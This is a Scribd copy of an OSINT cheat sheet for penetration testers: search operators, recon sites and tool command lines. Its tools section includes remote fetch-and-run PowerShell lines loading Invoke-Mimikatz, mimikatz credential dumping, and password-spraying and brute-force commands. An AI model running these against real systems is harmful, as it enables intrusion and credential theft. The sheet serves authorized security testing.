Scribd
Upload
20 views

OSINT CheatSheet

The document is a comprehensive cheat sheet for tactical Open Source Intelligence (OSINT) tailored for penetration testers. It includes advanced search techniques, tools for domain and subdomain searches, email and username checks, IP address investigations, and monitoring alerts, as well as resources for deep and dark web exploration. Additionally, it lists various command-line tools and their usage for effective OSINT gathering and analysis.

Uploaded by

kubancik
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
20 views

OSINT CheatSheet

The document is a comprehensive cheat sheet for tactical Open Source Intelligence (OSINT) tailored for penetration testers. It includes advanced search techniques, tools for domain and subdomain searches, email and username checks, IP address investigations, and monitoring alerts, as well as resources for deep and dark web exploration. Additionally, it lists various command-line tools and their usage for effective OSINT gathering and analysis.

Uploaded by

kubancik
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

Tactical OSINT For Pentesters: OSINT CheatSheet

Advanced Search
site:target.com
inurl:target.com
Google
filetype:pdf
AND, OR, - , “”
ip:​<ip_address>
Bing
feed:osint
osint date=20140808..20140810
Yandex lang:en
osint mime:pdf
Reverse IP lookup yougetsignal.com

Domain
Domain IP history http://viewdns.info/iphistory/?domain=<domainname>
DNS Records https://mxtoolbox.com/SuperTool.aspx
nslookup nslookup reconvillage.org all
dig reconvillage.org
dig
dig reconvillage.org cname
Addons
- Buildwith
Web Technology Profiling - Wappalyzer
Job Portals
Forums (stackoverflow, etc)

SubDomain Search
DNS Dumpster dnsdumpster.com
Wolframalpha www.wolframalpha.com/input/?i=uber.com
Netcraft searchdns.netcraft.com
Censys censys.io/ipv4?q=uber.com
Shodan www.shodan.io/search?query=uber.com
crt.sh crt.sh/?q=%uber.com
sublist3r python sublist3r.py -d uber.com -t 50 -b -p 80,443,21,22
massdns massdns -r lists/resolvers.txt -t AAAA domains.txt
Company Name
Zoominfo zoominfo.com
Glassdoor glassdoor.com
Hoovers hoovers.com
Crunchbase crunchbase.com

Email ID
Social Profiles dashboard.clearbit.com/lookup
Slides www.slideshare.net/search/slideshow?q=<email_id>
haveibeenpwned.com
Breach status publicdbhost.dmca.gripe
@dumpmon - twitter.com/dumpmon
Github search
Github Gist search
Source Code aggregators
If search not available, use Google dorks. Example-
site:bitbucket.org intext:osint
pastebin.com
psbdmp.com
Paste websites pastie.org
Google Custom Search Engine
https://inteltechniques.com/osint/pastebins.html
Email Sherlock www.emailsherlock.com

Username
Tweets from a location twimap.com
Check usernames https://gaddr.me/search?type=profiles&q=upgoingstar
Facebook OSINT https://inteltechniques.com/osint/facebook.html
redditsearch.io
Reddit OSINT
reditr.com
sleepingtime.org
Twitter OSINT crowdriff.com/riffle/
tinfoleak.com
keybase.io
Verified Information
Rapportive
People Full Name
XYZ Advanced Google Search Operator
ABC ABC XYZ

IP Address
whois -h whois.radb.net -T route <IP>
IP whois whois -h whois.radb.net -- -i origin <ASN-ID> | grep -Eo
"([0-9.]+){4}/[0-9]+" | sort -n | uniq -c
ASN ID nmap --script targets-asn --script-args targets-asn.asn=<ASN-ID>
VirusTotal virustotal.com
Robtex robtex.com
threatfeeds.io
ThreatIntel Feeds
http://thecyberthreat.com/cyber-threat-intelligence-feeds/
Shodan shodan.io
Censys censys.io
Zoomeye zoomeye.org
SecurityTrails securitytrails.com
Hurricane Labs http://bgp.he.net/dns/

Monitoring and Alerting


tweetmonitor.py -k <keyword>
Social Media Monitor
tweetmonitor.py -k <keyword> -m <receiver_email>
Keyword Based Alerts Google alerts
www.changedetection.com
follow.net
Web Site changes
Page Monitor (Chrome extension)
visualping.io
Tweetdeck tweetdeck.twitter.com

Deep and Dark Web


The Hidden Wiki hiddenwik55b36km.onion/index.php/Main_Page
Ahmia ahmia.fi
Onion Cab onion.cab/?a=search&q=<keyword>
Misc
Search Results Clustering
search.carrot2.org
Engine
images.google.com
Reverse Image Search
www.tineye.com
Books
Extract Info from Public Conferences
Resources Speaker
Slidedeck
Metasearch Engine www.polymeta.com
pipl.com
People Search Engine Peekyou
Marketvisual
Social Search Engine socialmention.com
Phone Number Search Engine Truecaller
Wayback Machine archive.org
Computational Knowledge
wolframalpha.com
Engine
OSINT Mindmap yoga.osint.ninja
OSINT Framework osintframework.com
Public Telegram Groups tgstat.com
duckduckgo.com
Semantic Search
kgine.com
nerdydata.com
Source Code Search Engine
searchcode.com
censys.io
shodan.io
zoomeye.org
fofa.so
Search Engines for Hackers onyphe.io
app.binaryedge.io
hunter.io
wigle.net
ghostproject.fr

Some service might require signup.


Tools
$ ./exampletool -h
$ ./exampletool --help
Generic Help Commands $ python exampletool.py
$ python3 exampletool.py
$ sudo ./exampletool
List directory tree
$ tree -L 2
structure, two levels
Find Tools (using keyword) $ find . | grep ​<keyword>​ | head -n 1
Wordlists /home/bhasia/Tools/Wordlists/
Set Environment Variables:
$ export AWS_ACCESS_KEY_ID=AKIAIOSXODNN7EXAMPLE
$ export
AWS CLI AWS_SECRET_ACCESS_KEY=wJaorXUrnWEMI/K7MDENG/bPxRfiC
YEXAMPLEKEY
$ export AWS_DEFAULT_REGION=us-west-2
$ aws help
GCP CLI $ gcloud --help
Azure CLI $ az
> powershell.exe

Bypass Execution Policy:


Powershell (Windows)
> powershell –ExecutionPolicy Bypass
> powershell.exe -ep bypass
> $Env:PSExecutionPolicyPreference = 'Bypass'
Powershell (Linux) $ pwsh
ADRecon (powershell) > Import-Module .\ADRecon.ps1
aiodnsbrute $ aiodnsbrute -w wordlist.txt -vv -t 1024 domain.com
$ ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s
altdns
results_output.txt
Anubis $ anubis -t reddit.com
$ python AWSBucketDump.py -l BucketNames.txt -g
AWSBucketDump
interesting_Keywords.txt -D -m 500000 -d 1
Belati $ ./Belati.py --help
BlackWidow $ sudo ./blackwidow -u https://target.com
$ python brutespray.py --file nmap.gnmap -U userlist.txt -P
brutespray
passlist.txt --threads 5 --hosts 5
Bucket_Enumerator $ python parse.py urls.txt
bucket_finder $ ./bucket_finder.rb sample_wordlist
BurpSuite $ java -jar burpsuite.jar
carrot2-workbench-3.16.1 $ ./carrot2-workbench
censys-enumeration $ python censys_enumeration.py domains.txt
certgraph $ certgraph -json yandex.com
CeWL $ ./cewl.rb http://example.com
Chameleon $ python chameleon.py --proxy a --check --domain example.com
changeme $ ./changeme.py 192.168.10.0/24
CloudFail $ python3 cloudfail.py --target example.com
$ ./bucket_finder.rb sample_list
CloudStorageFinder
$ ./space_finder.rb sample_list
Cr3dOv3r $ python3 Cr3d0v3r.py [email protected]
CrackMapExec $ crackmapexec 192.168.20.0/24 -u USERNAME -p "P@$$w0rd"
create_bucket_patterns.py $ python create_bucket_patterns.py KEYWORD
$ python credmap.py --email [email protected] --user
credmap
testexample
$ ./install.sh
CredSniper
$ python credsniper.py --help
ct-exposer $ python3 ct-exposer.py -d yandex.com
$ ./domainOsint.py example.com
datasploit
$ ./emailOsint.py [email protected]
dnscan $ ./dnscan.py -d example.com
$ ./dns-queue.py example.com 100 output.txt -i
dns-parallel-prober
subdomains-list.txt -f
dnsrecon $ ./dnsrecon.py -d example.com
dnstwist $ ./dnstwist.py example.com
domainhunter $ python3 ./domainhunter.py -s example.com
email_pattern_generator.py $ python email_pattern_generator.py John Doe example.com
enum4linux $ enum4linux.pl -a 192.168.20.10
$ python enumerate_tech.py
enumerate_tech.py
Execute find_http_https.py before this.
exiftool $ ./exiftool sample.jpg
EyeWitness $ ./EyeWitness -f urls_list.txt --web
find_http_https.py $ python find_http_https.py subdomains.txt
gasmask $ python gasmask.py -d example.com -i basic
GCPBucketBrute $ python3 gcpbucketbrute.py -k examplebucket -u
github-dorks $ python github-dork.py -r redhuntlabs/RedHunt-OS
gitleaks $ gitleaks -r https://github.com/redhuntlabs/RedHunt-OS
$ export
GITROB_ACCESS_TOKEN=testsampletestsampletestsampletestsa
gitrob
mple
$ gitrob https://github.com/redhuntlabs/RedHunt-OS
$ ./gophish
gophish
Visit: https://127.0.0.1:3333
$ python infoga.py --domain example.com --source all --breach -v
Infoga
2 --report example_output.txt
inSp3ctor $ python inSp3ctor.py -n example
> IEX (New-Object
Net.WebClient).DownloadString("https://raw.githubusercontent.c
Inveigh (powershell)
om/Kevin-Robertson/Inveigh/master/Inveigh.ps1")
> Invoke-Inveigh -ConsoleOutput Y
john $ ./john password_hashes
LinEnum $ ./LinEnum.sh
$ python LinkedInt.py
LinkedInt
Add linkedin credentials and Hunter.io API key in LinkedInt.py first
Maltego $ maltego
masscan $ masscan -p80,8000-8080 20.0.0.0/8
$ massdns -r lists/resolvers.txt -t AAAA -w results_file.txt
massdns
domains_list.txt
$ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o
metagoofil
applefiles -f results.html
> IEX (New-Object
Net.WebClient).DownloadString("https://raw.githubusercontent.c
om/NetSPI/MicroBurst/master/Invoke-EnumerateAzureSubDoma
MicroBurst (powershell)
ins.ps1")
> Invoke-EnumerateAzureSubDomains -Base example -Verbose

> mimikatz.exe
mimikatz > mimikatz # privilege::debug
> mimikatz # sekurlsa::logonPasswords full
$ python3 ghdb_scraper.py -j -s
pagodo $ python3 pagodo.py -g google_dorks_20190312_103108.txt -d
example.com
$ python passwordgen.py exampleuser
password_gen
$ python passwordgen_fromfile.py examplefile.txt
PDF-tools $ python pdf-parser.py pdffile.pdf
> IEX (New-Object
PowerSploit (powershell)
System.Net.Webclient).DownloadString('https://raw.githubuserco
ntent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Inv
oke-Mimikatz.ps1'); Invoke-Mimikatz
$ ./recon-ng
recon-ng
Set API keys beforehand
robo3t $ ./robo3t
$ ./ruler-linux32 --url
ruler http://autodiscover.example.com/autodiscover/autodiscover.xml
brute --users users.txt --passwords password.txt
S3Scanner $ python ./s3scanner.py names.txt
ScoutSuite $ python Scout.py -h
set $ sudo ./setoolkit
$ python3 spaces_finder.py -l SpacesNames_list.txt -g
spaces-finder
interesting_keywords_list.txt -D -m 500000 -d 1 -t 5
$ ./sf.py
spiderfoot
Visit http://127.0.0.1:5001
$ spray.sh -smb 192.168.0.5 users.txt passwords.txt 1 35
Spray
InternamDomain
Sticky-Keys-Slayer $ ./stickyKeysSlayer.sh -v 192.168.0.10
subbrute $ ./subbrute.py -p example.com
Sublist3r $ python sublist3r.py -d example.com
TekDefense-Automater $ python Automater.py 8.8.8.8
theHarvester $ ./theHarvester.py -d example.com
$ ./tinfoleak.py
tinfoleak
Configure twitter auth keys in tinfoleak.conf
TorBrowser $ ./start-tor-browser.desktop
$ trufflehog --regex --entropy=False
truffleHog
https://github.com/redhuntlabs/RedHunt-OS.git
Turbolist3r $ python turbolist3r.py -d example.com
$ python tweetmonitor.py -k osint
TweetMonitor
Configure twitter auth keys in the code tweetmonitor.py
tweets_analyzer $ ./tweets_analyzer.py -n sudhanshu_c
username-anarchy $ ./username-anarchy john doe
webscreenshot $ python webscreenshot.py -i url_list.txt
wordlists Common username, password and subdomain lists
$ python wpforce.py -i usr.txt -w pass.txt -u
WPForce
"http://blog.example.com"
ZAP_2.7.0 $ ./zap.sh

You might also like